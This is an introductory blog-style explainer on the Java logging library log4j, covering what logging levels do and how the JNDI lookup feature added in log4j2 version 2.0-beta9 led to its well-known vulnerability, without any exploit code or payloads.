Talking about log4j , it is a popular library for JAVA created in 2001 . This library mainly serves the purpose for logging .
So , what a logging library does , is instead of using the print statement . The developer just uses a wrapper around the logging class or object . So instead of using print(line), the code would look like this:
logging.INFO(“Application Started”)
logging.WARN(“File Uploaded”)
logging.DEBUG(“SQL Query Ran”)
Then the application has a configuration file which says what log levels (INFO, WARN, DEBUG, etc.) to display. This way when there is a problem with the application, the developer can enable DEBUG mode and instantly get the messages they need to identify the issue.
Now, about log4j logging operation it allows us to log expression . From here we can say that log4j is expression based vulnerability / input validation vulnerability
The vulnerability introduced to log4j2 in version 2.0 -beta 9 . As JNDI (Java Naming and Directory Interface) lookup plugin was added to it .
This version of log4j allowed lookups to provide a way to add values to it’s configuration . Like Map Lookups , Environment lookups , JNDI lookups , System Properties lookups .
Note: New version added Docker and Kubernetes lookups